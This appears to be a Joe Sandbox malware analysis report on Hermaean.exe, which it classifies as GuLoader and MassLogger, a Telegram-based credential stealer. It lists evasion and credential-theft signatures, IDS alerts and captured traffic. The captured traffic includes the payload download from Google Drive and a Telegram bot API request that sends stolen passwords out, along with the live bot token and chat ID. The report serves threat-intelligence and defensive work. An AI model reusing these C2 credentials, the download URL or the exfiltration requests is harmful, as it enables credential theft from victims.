Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Hermaean.exe

Overview

General Information

Sample name:Hermaean.exe
Analysis ID:1617009
MD5:a5350eaa7864ac06277c445e0f52f9d9
SHA1:9a589f6dcbb0ee908a1665501b3e249a00c05db8
SHA256:eab16fb9a96dba4a00c074dec9d6be01b5d93b680d69d230c21497fce96f9de5
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Hermaean.exe (PID: 3436 cmdline: "C:\Users\user\Desktop\Hermaean.exe" MD5: A5350EAA7864AC06277C445E0F52F9D9)
    • Hermaean.exe (PID: 2920 cmdline: "C:\Users\user\Desktop\Hermaean.exe" MD5: A5350EAA7864AC06277C445E0F52F9D9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot8064131224:AAFmNYMbo3lhB_qXAgZHNTpxwkQ6BCP9UWY/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "8064131224:AAFmNYMbo3lhB_qXAgZHNTpxwkQ6BCP9UWY", "Telegram Chatid": "6900395692"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000001.00000002.2244389028.00000000053A2000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: Hermaean.exe PID: 3436JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
            Click to see the 3 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-17T12:43:34.089086+010020577441Malware Command and Control Activity Detected192.168.2.849912149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-17T12:43:26.526487+010028032742Potentially Bad Traffic192.168.2.849864132.226.247.7380TCP
            2025-02-17T12:43:33.089059+010028032742Potentially Bad Traffic192.168.2.849864132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-17T12:43:20.434018+010028032702Potentially Bad Traffic192.168.2.849823216.58.206.78443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-17T12:43:33.783477+010018100081Potentially Bad Traffic192.168.2.849912149.154.167.220443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "8064131224:AAFmNYMbo3lhB_qXAgZHNTpxwkQ6BCP9UWY", "Telegram Chatid": "6900395692"}
            Source: Hermaean.exe.2920.6.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8064131224:AAFmNYMbo3lhB_qXAgZHNTpxwkQ6BCP9UWY/sendMessage"}
            Multi AV Scanner detection for submitted file
            Source: Hermaean.exeVirustotal: Detection: 72%Perma Link
            Source: Hermaean.exeReversingLabs: Detection: 62%
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35002270 CryptUnprotectData,6_2_35002270
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35002990 CryptUnprotectData,6_2_35002990
            Source: Hermaean.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49871 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.8:49823 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49833 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49912 version: TLS 1.2
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 1_2_0040276E FindFirstFileW,1_2_0040276E
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 1_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,1_2_00405770
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 1_2_0040622B FindFirstFileW,FindClose,1_2_0040622B
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_0040276E FindFirstFileW,6_2_0040276E
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,6_2_00405770
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_0040622B FindFirstFileW,FindClose,6_2_0040622B
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 049D5782h6_2_049D5366
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 049D51B9h6_2_049D4F08
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 049D5782h6_2_049D56AF
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500CC30h6_2_3500C988
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 35001935h6_2_350015F8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500EBD0h6_2_3500E928
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500C7D8h6_2_3500C530
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 35000FF1h6_2_35000D48
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500F028h6_2_3500ED80
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 35001449h6_2_350011A0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500F480h6_2_3500F1D8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500D088h6_2_3500CDE0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500DEC8h6_2_3500DC20
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500BAD0h6_2_3500B828
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 350002E9h6_2_35000040
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 35003EF8h6_2_35003C50
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500E320h6_2_3500E078
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500BF28h6_2_3500BC80
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 35000741h6_2_35000498
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500A0C0h6_2_35009CA0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 35004350h6_2_350040A8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500E778h6_2_3500E4D0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500C380h6_2_3500C0D8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 35000B99h6_2_350008F0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500ADC8h6_2_3500AB20
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 350031F0h6_2_35002F48
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500B220h6_2_3500AF78
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 35003648h6_2_350033A0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500B678h6_2_3500B3D0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 35003AA0h6_2_350037F8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500F8D8h6_2_3500F630
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500D4E0h6_2_3500D238
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500A518h6_2_3500A270
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500FD30h6_2_3500FA88
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500D93Ah6_2_3500D690
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 3500A970h6_2_3500A6C8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 35002D98h6_2_35002AF0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 353017FDh6_2_35301620
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 35302187h6_2_35301620
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then push 00000000h6_2_35304E48
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_35301163
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_35301343
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_35305C56
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then push 00000000h6_2_3530599E
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 35300740h6_2_35300498
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then jmp 353002E8h6_2_35300040
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_35300B20
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then mov ecx, 000003E8h6_2_385D0898
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then mov ecx, 000003E8h6_2_385D088F
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then push 00000000h6_2_385DDBDF
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then push 00000000h6_2_385DD088
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]6_2_385DD088

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49912 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49912 -> 149.154.167.220:443
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot8064131224:AAFmNYMbo3lhB_qXAgZHNTpxwkQ6BCP9UWY/sendDocument?chat_id=6900395692&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd4f1e65439e8eHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
            Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49864 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49823 -> 216.58.206.78:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1du6OhkwMOVgv695pSCJPeCEIGpQS3l7K HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1du6OhkwMOVgv695pSCJPeCEIGpQS3l7K&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49871 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1du6OhkwMOVgv695pSCJPeCEIGpQS3l7K HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1du6OhkwMOVgv695pSCJPeCEIGpQS3l7K&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot8064131224:AAFmNYMbo3lhB_qXAgZHNTpxwkQ6BCP9UWY/sendDocument?chat_id=6900395692&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd4f1e65439e8eHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
            Source: Hermaean.exe, 00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: Hermaean.exe, 00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
            Source: Hermaean.exe, 00000006.00000002.3012907907.00000000353A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: Hermaean.exe, 00000006.00000002.3012907907.00000000353A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
            Source: Hermaean.exe, 00000006.00000002.3012907907.0000000035393000.00000004.00000800.00020000.00000000.sdmp, Hermaean.exe, 00000006.00000002.3012907907.00000000353A0000.00000004.00000800.00020000.00000000.sdmp, Hermaean.exe, 00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: Hermaean.exe, 00000006.00000002.3012907907.0000000035321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: Hermaean.exe, 00000006.00000002.3012907907.00000000353A0000.00000004.00000800.00020000.00000000.sdmp, Hermaean.exe, 00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
            Source: Hermaean.exe, 00000006.00000002.3012907907.00000000353A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
            Source: Hermaean.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Hermaean.exe, 00000006.00000002.3012907907.00000000353BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: Hermaean.exe, 00000006.00000002.3012907907.00000000353BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
            Source: Hermaean.exe, 00000006.00000002.3012907907.0000000035321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Hermaean.exe, 00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: Hermaean.exe, 00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: Hermaean.exe, 00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8064131224:AAFmNYMbo3lhB_qXAgZHNTpxwkQ6BCP9UWY/sendDocument?chat_id=6900
            Source: Hermaean.exe, 00000006.00000003.2443074903.0000000004C62000.00000004.00000020.00020000.00000000.sdmp, Hermaean.exe, 00000006.00000003.2443162467.0000000004C62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: Hermaean.exe, 00000006.00000002.2992279228.0000000004BE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: Hermaean.exe, 00000006.00000002.2992279228.0000000004BE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/-4e5c-ae1f-9bc86c8e8c94
            Source: Hermaean.exe, 00000006.00000002.2992727582.0000000006600000.00000004.00001000.00020000.00000000.sdmp, Hermaean.exe, 00000006.00000002.2992279228.0000000004C22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1du6OhkwMOVgv695pSCJPeCEIGpQS3l7K
            Source: Hermaean.exe, 00000006.00000002.2992279228.0000000004C22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1du6OhkwMOVgv695pSCJPeCEIGpQS3l7Kk
            Source: Hermaean.exe, 00000006.00000002.2992279228.0000000004C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: Hermaean.exe, 00000006.00000002.2992279228.0000000004BE8000.00000004.00000020.00020000.00000000.sdmp, Hermaean.exe, 00000006.00000002.2992279228.0000000004C3F000.00000004.00000020.00020000.00000000.sdmp, Hermaean.exe, 00000006.00000003.2443074903.0000000004C62000.00000004.00000020.00020000.00000000.sdmp, Hermaean.exe, 00000006.00000003.2443162467.0000000004C62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1du6OhkwMOVgv695pSCJPeCEIGpQS3l7K&export=download
            Source: Hermaean.exe, 00000006.00000002.2992279228.0000000004BE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1du6OhkwMOVgv695pSCJPeCEIGpQS3l7K&export=download#
            Source: Hermaean.exe, 00000006.00000002.2992279228.0000000004BE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1du6OhkwMOVgv695pSCJPeCEIGpQS3l7K&export=downloadE
            Source: Hermaean.exe, 00000006.00000002.2992279228.0000000004C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1du6OhkwMOVgv695pSCJPeCEIGpQS3l7K&export=downloadp
            Source: Hermaean.exe, 00000006.00000002.3012907907.00000000353A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: Hermaean.exe, 00000006.00000002.3012907907.00000000353A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: Hermaean.exe, 00000006.00000002.3012907907.00000000353A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
            Source: Hermaean.exe, 00000006.00000002.3012907907.00000000353A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
            Source: Hermaean.exe, 00000006.00000002.2992279228.0000000004C4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: Hermaean.exe, 00000006.00000002.2992279228.0000000004C4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: Hermaean.exe, 00000006.00000002.2992279228.0000000004C4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: Hermaean.exe, 00000006.00000002.2992279228.0000000004C4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: Hermaean.exe, 00000006.00000002.2992279228.0000000004C4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
            Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
            Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.8:49823 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49833 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49912 version: TLS 1.2
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 1_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004052D1
            Source: C:\Users\user\Desktop\Hermaean.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 1_2_00403358 EntryPoint,LdrInitializeThunk,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_00403358
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_00403358 EntryPoint,LdrInitializeThunk,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,6_2_00403358
            Source: C:\Users\user\Desktop\Hermaean.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 1_2_00404B0E1_2_00404B0E
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 1_2_0040653D1_2_0040653D
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_00404B0E6_2_00404B0E
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_0040653D6_2_0040653D
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_049D30FC6_2_049D30FC
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_049D7E686_2_049D7E68
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_049D4F086_2_049D4F08
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_049D4EF86_2_049D4EF8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_049D7E666_2_049D7E66
